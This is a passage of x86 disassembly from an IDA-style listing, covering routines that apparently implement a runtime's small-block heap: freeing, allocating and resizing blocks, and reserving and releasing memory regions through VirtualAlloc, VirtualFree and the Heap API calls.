lea ecx, [eax+ecx*4]
loc_41B07E: ; CODE XREF: sub_41B06E+26�j
cmp eax, ecx
jnb short loc_41B096
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41B098
add eax, 14h
jmp short loc_41B07E
; ---------------------------------------------------------------------------
loc_41B096: ; CODE XREF: sub_41B06E+12�j
xor eax, eax
locret_41B098: ; CODE XREF: sub_41B06E+21�j
retn
sub_41B06E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B099 proc near ; CODE XREF: sub_418227+23�p
; sub_419C9F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41B3BD
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41B16F
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41B0FD
push 3Fh
pop edx
loc_41B0FD: ; CODE XREF: sub_41B099+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41B151
cmp edx, 20h
jnb short loc_41B128
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41B149
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B149
; ---------------------------------------------------------------------------
loc_41B128: ; CODE XREF: sub_41B099+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B149
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B149: ; CODE XREF: sub_41B099+86�j
; sub_41B099+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41B154
; ---------------------------------------------------------------------------
loc_41B151: ; CODE XREF: sub_41B099+6A�j
mov ecx, [ebp+var_4]
loc_41B154: ; CODE XREF: sub_41B099+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41B16F: ; CODE XREF: sub_41B099+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41B17D
push 3Fh
pop edx
loc_41B17D: ; CODE XREF: sub_41B099+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41B220
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41B1A2
mov ebx, esi
loc_41B1A2: ; CODE XREF: sub_41B099+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41B1B4
mov edx, esi
loc_41B1B4: ; CODE XREF: sub_41B099+117�j
cmp ebx, edx
jz short loc_41B21B
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41B203
cmp ebx, 20h
jnb short loc_41B1E4
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41B203
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41B203
; ---------------------------------------------------------------------------
loc_41B1E4: ; CODE XREF: sub_41B099+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41B203
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41B203: ; CODE XREF: sub_41B099+128�j
; sub_41B099+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41B21B: ; CODE XREF: sub_41B099+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41B223
; ---------------------------------------------------------------------------
loc_41B220: ; CODE XREF: sub_41B099+ED�j
mov ebx, [ebp+arg_0]
loc_41B223: ; CODE XREF: sub_41B099+185�j
cmp [ebp+var_C], 0
jnz short loc_41B231
cmp ebx, edx
jz loc_41B2B2
loc_41B231: ; CODE XREF: sub_41B099+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41B2B2
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41B289
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B278
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41B278: ; CODE XREF: sub_41B099+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41B2B2
; ---------------------------------------------------------------------------
loc_41B289: ; CODE XREF: sub_41B099+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B29F
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41B29F: ; CODE XREF: sub_41B099+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41B2B2: ; CODE XREF: sub_41B099+192�j
; sub_41B099+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41B3BD
mov eax, dword ptr byte_445EDC+0D5A34h
test eax, eax
jz loc_41B3AF
mov ecx, dword ptr byte_445EDC+0D5A2Ch
mov esi, VirtualFree
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h ; dwFreeType
push ebx ; dwSize
push ecx ; lpAddress
call esi ; VirtualFree
mov ecx, dword ptr byte_445EDC+0D5A2Ch
mov eax, dword ptr byte_445EDC+0D5A34h
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword ptr byte_445EDC+0D5A34h
mov ecx, dword ptr byte_445EDC+0D5A2Ch
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword ptr byte_445EDC+0D5A34h
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword ptr byte_445EDC+0D5A34h
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41B340
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword ptr byte_445EDC+0D5A34h
loc_41B340: ; CODE XREF: sub_41B099+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41B3AF
push ebx ; dwFreeType
push 0 ; dwSize
push dword ptr [eax+0Ch] ; lpAddress
call esi ; VirtualFree
mov eax, dword ptr byte_445EDC+0D5A34h
push dword ptr [eax+10h] ; lpMem
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapFree
mov eax, dword ptr byte_445EDC+0D5A38h
mov edx, dword ptr byte_445EDC+0D5A3Ch
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword ptr byte_445EDC+0D5A34h
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_4188B0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword ptr byte_445EDC+0D5A38h
cmp eax, dword ptr byte_445EDC+0D5A34h
jbe short loc_41B3A5
sub [ebp+arg_0], 14h
loc_41B3A5: ; CODE XREF: sub_41B099+306�j
mov eax, dword ptr byte_445EDC+0D5A3Ch
mov dword ptr byte_445EDC+0D5A30h, eax
loc_41B3AF: ; CODE XREF: sub_41B099+234�j
; sub_41B099+2AB�j
mov eax, [ebp+arg_0]
mov dword ptr byte_445EDC+0D5A2Ch, edi
mov dword ptr byte_445EDC+0D5A34h, eax
loc_41B3BD: ; CODE XREF: sub_41B099+38�j
; sub_41B099+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B099 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3C2 proc near ; CODE XREF: sub_4181B3+18�p
; sub_419C9F+77�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword ptr byte_445EDC+0D5A38h
mov edx, dword ptr byte_445EDC+0D5A3Ch
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41B402
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41B412
; ---------------------------------------------------------------------------
loc_41B402: ; CODE XREF: sub_41B3C2+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41B412: ; CODE XREF: sub_41B3C2+3E�j
mov eax, dword ptr byte_445EDC+0D5A30h
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41B439
loc_41B420: ; CODE XREF: sub_41B3C2+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B439
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41B420
loc_41B439: ; CODE XREF: sub_41B3C2+5C�j
; sub_41B3C2+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41B4B7
mov ebx, edx
loc_41B440: ; CODE XREF: sub_41B3C2+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B45C
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B45A
add ebx, 14h
jmp short loc_41B440
; ---------------------------------------------------------------------------
loc_41B45A: ; CODE XREF: sub_41B3C2+91�j
cmp ebx, eax
loc_41B45C: ; CODE XREF: sub_41B3C2+83�j
jnz short loc_41B4B7
loc_41B45E: ; CODE XREF: sub_41B3C2+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41B474
cmp dword ptr [ebx+8], 0
jnz short loc_41B471
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41B45E
; ---------------------------------------------------------------------------
loc_41B471: ; CODE XREF: sub_41B3C2+A5�j
cmp ebx, [ebp+var_4]
loc_41B474: ; CODE XREF: sub_41B3C2+9F�j
jnz short loc_41B49C
mov ebx, edx
loc_41B478: ; CODE XREF: sub_41B3C2+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41B48C
cmp dword ptr [ebx+8], 0
jnz short loc_41B48A
add ebx, 14h
jmp short loc_41B478
; ---------------------------------------------------------------------------
loc_41B48A: ; CODE XREF: sub_41B3C2+C1�j
cmp ebx, eax
loc_41B48C: ; CODE XREF: sub_41B3C2+BB�j
jnz short loc_41B49C
call sub_41B6CB
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41B4B0
loc_41B49C: ; CODE XREF: sub_41B3C2:loc_41B474�j
; sub_41B3C2:loc_41B48C�j
push ebx
call sub_41B77C
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41B4B7
loc_41B4B0: ; CODE XREF: sub_41B3C2+D8�j
xor eax, eax
jmp loc_41B6C6
; ---------------------------------------------------------------------------
loc_41B4B7: ; CODE XREF: sub_41B3C2+7A�j
; sub_41B3C2:loc_41B45C�j ...
mov dword ptr byte_445EDC+0D5A30h, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41B4DE
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41B515
loc_41B4DE: ; CODE XREF: sub_41B3C2+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41B512
loc_41B4FB: ; CODE XREF: sub_41B3C2+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41B4FB
loc_41B512: ; CODE XREF: sub_41B3C2+137�j
mov edx, [ebp+var_4]
loc_41B515: ; CODE XREF: sub_41B3C2+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41B53E
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41B53E: ; CODE XREF: sub_41B3C2+16D�j
; sub_41B3C2+183�j
test ecx, ecx
jl short loc_41B547
shl ecx, 1
inc edi
jmp short loc_41B53E
; ---------------------------------------------------------------------------
loc_41B547: ; CODE XREF: sub_41B3C2+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41B564
push 3Fh
pop esi
loc_41B564: ; CODE XREF: sub_41B3C2+19D�j
cmp esi, edi
jz loc_41B679
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B5D5
cmp edi, 20h
jge short loc_41B5A4
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41B5D2
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41B5D5
; ---------------------------------------------------------------------------
loc_41B5A4: ; CODE XREF: sub_41B3C2+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41B5D2
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41B5D5
; ---------------------------------------------------------------------------
loc_41B5D2: ; CODE XREF: sub_41B3C2+1D6�j
; sub_41B3C2+203�j
mov ebx, [ebp+arg_0]
loc_41B5D5: ; CODE XREF: sub_41B3C2+1B0�j
; sub_41B3C2+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41B685
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B676
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41B647
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B635
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41B635: ; CODE XREF: sub_41B3C2+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41B676
; ---------------------------------------------------------------------------
loc_41B647: ; CODE XREF: sub_41B3C2+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B660
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41B660: ; CODE XREF: sub_41B3C2+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41B676: ; CODE XREF: sub_41B3C2+24E�j
; sub_41B3C2+283�j
mov ecx, [ebp+var_8]
loc_41B679: ; CODE XREF: sub_41B3C2+1A4�j
test ecx, ecx
jz short loc_41B688
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41B688
; ---------------------------------------------------------------------------
loc_41B685: ; CODE XREF: sub_41B3C2+229�j
mov ecx, [ebp+var_8]
loc_41B688: ; CODE XREF: sub_41B3C2+2B9�j
; sub_41B3C2+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41B6BE
cmp ebx, dword ptr byte_445EDC+0D5A34h
jnz short loc_41B6BE
mov ecx, [ebp+var_4]
cmp ecx, dword ptr byte_445EDC+0D5A2Ch
jnz short loc_41B6BE
and dword ptr byte_445EDC+0D5A34h, 0
loc_41B6BE: ; CODE XREF: sub_41B3C2+2E0�j
; sub_41B3C2+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41B6C6: ; CODE XREF: sub_41B3C2+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B3C2 endp
; =============== S U B R O U T I N E =======================================
sub_41B6CB proc near ; CODE XREF: sub_41B3C2+CC�p
mov eax, dword ptr byte_445EDC+0D5A38h
mov ecx, dword ptr byte_445EDC+0D5A28h
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41B70E
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax ; dwBytes
push dword ptr byte_445EDC+0D5A3Ch ; lpMem
push edi ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapReAlloc
cmp eax, edi
jz short loc_41B75E
add dword ptr byte_445EDC+0D5A28h, 10h
mov dword ptr byte_445EDC+0D5A3Ch, eax
mov eax, dword ptr byte_445EDC+0D5A38h
loc_41B70E: ; CODE XREF: sub_41B6CB+11�j
mov ecx, dword ptr byte_445EDC+0D5A3Ch
push 41C4h ; dwBytes
push 8 ; dwFlags
lea eax, [eax+eax*4]
push dword ptr byte_445EDC+0D5A44h ; hHeap
lea esi, [ecx+eax*4]
call HeapAlloc
cmp eax, edi
mov [esi+10h], eax
jz short loc_41B75E
push 4 ; flProtect
push 2000h ; flAllocationType
push 100000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41B762
push dword ptr [esi+10h] ; lpMem
push edi ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapFree
loc_41B75E: ; CODE XREF: sub_41B6CB+30�j
; sub_41B6CB+67�j
xor eax, eax
jmp short loc_41B779
; ---------------------------------------------------------------------------
loc_41B762: ; CODE XREF: sub_41B6CB+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword ptr byte_445EDC+0D5A38h
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41B779: ; CODE XREF: sub_41B6CB+95�j
pop edi
pop esi
retn
sub_41B6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B77C proc near ; CODE XREF: sub_41B3C2+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41B78E: ; CODE XREF: sub_41B77C+19�j
test eax, eax
jl short loc_41B797
shl eax, 1
inc ebx
jmp short loc_41B78E
; ---------------------------------------------------------------------------
loc_41B797: ; CODE XREF: sub_41B77C+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41B7AC: ; CODE XREF: sub_41B77C+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41B7AC
mov edi, ebx
push 4 ; flProtect
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h ; flAllocationType
push 8000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
test eax, eax
jnz short loc_41B7DF
or eax, 0FFFFFFFFh
jmp loc_41B872
; ---------------------------------------------------------------------------
loc_41B7DF: ; CODE XREF: sub_41B77C+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41B825
lea eax, [edi+10h]
loc_41B7EC: ; CODE XREF: sub_41B77C+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41B7EC
loc_41B825: ; CODE XREF: sub_41B77C+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41B862
or [eax+4], edi
loc_41B862: ; CODE XREF: sub_41B77C+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41B872: ; CODE XREF: sub_41B77C+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B877 proc near ; CODE XREF: sub_419C9F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41BA25
test bl, 1
jnz loc_41BA1E
add ebx, ecx
cmp esi, ebx
jg loc_41BA1E
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41B8EE
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41B8EE: ; CODE XREF: sub_41B877+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41B93E
cmp ecx, 20h
jnb short loc_41B91A
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41B93E
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B93E
; ---------------------------------------------------------------------------
loc_41B91A: ; CODE XREF: sub_41B877+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B93E
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B93E: ; CODE XREF: sub_41B877+7D�j
; sub_41B877+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41BA0C
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41B978
push 3Fh
pop edi
loc_41B978: ; CODE XREF: sub_41B877+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41B9FA
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41B9D1
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B9C4
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41B9C4: ; CODE XREF: sub_41B877+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41B9F6
; ---------------------------------------------------------------------------
loc_41B9D1: ; CODE XREF: sub_41B877+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B9E7
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41B9E7: ; CODE XREF: sub_41B877+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41B9F6: ; CODE XREF: sub_41B877+158�j
shr edx, cl
or [eax], edx
loc_41B9FA: ; CODE XREF: sub_41B877+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41BA0F
; ---------------------------------------------------------------------------
loc_41BA0C: ; CODE XREF: sub_41B877+E5�j
mov edx, [ebp+arg_4]
loc_41BA0F: ; CODE XREF: sub_41B877+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41BB65
; ---------------------------------------------------------------------------
loc_41BA1E: ; CODE XREF: sub_41B877+52�j
; sub_41B877+5C�j
xor eax, eax
jmp loc_41BB68
; ---------------------------------------------------------------------------
loc_41BA25: ; CODE XREF: sub_41B877+49�j
jge loc_41BB65
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41BA50
push 3Fh
pop esi
loc_41BA50: ; CODE XREF: sub_41B877+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41BADF
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41BA69
push 3Fh
pop esi
loc_41BA69: ; CODE XREF: sub_41B877+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41BAB8
cmp esi, 20h
jnb short loc_41BA94
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41BAB5
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41BAB5
; ---------------------------------------------------------------------------
loc_41BA94: ; CODE XREF: sub_41B877+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
